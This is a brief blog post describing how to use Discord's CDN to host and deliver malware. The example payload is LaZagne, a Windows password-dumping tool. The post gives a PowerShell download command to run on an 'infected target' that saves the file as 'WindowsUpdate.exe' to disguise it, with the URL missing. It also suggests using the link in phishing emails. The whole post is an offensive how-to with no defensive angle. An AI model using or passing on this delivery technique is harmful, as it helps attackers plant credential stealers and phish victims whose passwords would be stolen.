Using Discord’s CDN for Malware Delivery

According to Google a CDN is:

A content delivery network (CDN) is a system of distributed servers (network) that deliver webpages and other Web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server.

Discord uses to display their content.
For example, when I send an image in a Discord server it is assigned a unique URL.
So I placed this image in an empty Discord server named testing.

But anyone can view it here.

What This Means

Discord’s CDN can be used to deliver malware to a target. In this case, I’m using Discord’s CDN servers to deliver LaZagne to an infected target. You can read about LaZagne here. In short, it dumps passwords from various apps and locations on Windows.

On the infected target, use PowerShell to download the file.

PS C:\Users\Ryan> Invoke-WebRequest -Uri -OutFile WindowsUpdate.exe

This has other implications as well. This link could be used in an email attachment for a basic phishing attack.

Posted in Computers and OSs, Malware, Networks, Security.

Leave a Reply

Your email address will not be published. Required fields are marked *